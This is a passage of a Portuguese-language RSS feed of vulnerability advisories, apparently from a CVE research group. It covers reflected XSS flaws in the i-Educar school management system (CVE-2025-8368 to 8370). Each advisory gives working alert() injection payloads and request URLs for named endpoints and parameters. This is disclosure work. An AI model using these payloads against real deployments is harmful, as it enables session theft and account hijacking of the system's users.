&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  /intranet/pesquisa_pessoa_lst.php?campo_busca=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;parâmetro-cpf&amp;#34;&amp;gt;Parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  /intranet/pesquisa_pessoa_lst.php?cpf=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8368.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8368.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8369</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8369/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8369/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8369-cross-site-scripting-xss-refletido-no-endpoint-educar_avaliacao_desempenho_lstphp-parâmetro-titulo_avaliacao&amp;#34;&amp;gt;CVE-2025-8369: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8369&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8369&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8369-cross-site-scripting-xss-refletido-no-endpoint-educar_avaliacao_desempenho_lstphp-parâmetro-titulo_avaliacao&amp;#34;&amp;gt;CVE-2025-8369: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8369&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8369&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;codificado&amp;#34;&amp;gt;Codificado
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Cscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Ealert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;28&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;XSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;PoC&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;29&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Fscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;decodificado&amp;#34;&amp;gt;Decodificado
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8369/image.png&amp;#34;
	width=&amp;#34;724&amp;#34;
	height=&amp;#34;774&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8369/image_hu_f2d2374689b068fc.png 480w, /p/cve-2025-8369/image_hu_e432fb0e1e210761.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;93&amp;#34;
		data-flex-basis=&amp;#34;224px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;url&amp;#34;&amp;gt;URL
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  /intranet/educar_avaliacao_desempenho_lst.php?titulo_avaliacao=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Quando um usuário acessa essa URL criada, o script é executado imediatamente no navegador, confirmando a vulnerabilidade.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8369.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8369.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8370</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8370/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8370/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8370-cross-site-scripting-xss-refletido-no-endpoint-educar_escolaridade_lstphp-parâmetro-descricao&amp;#34;&amp;gt;CVE-2025-8370: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8370&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8370&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8370-cross-site-scripting-xss-refletido-no-endpoint-educar_escolaridade_lstphp-parâmetro-descricao&amp;#34;&amp;gt;CVE-2025-8370: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8370&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8370&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
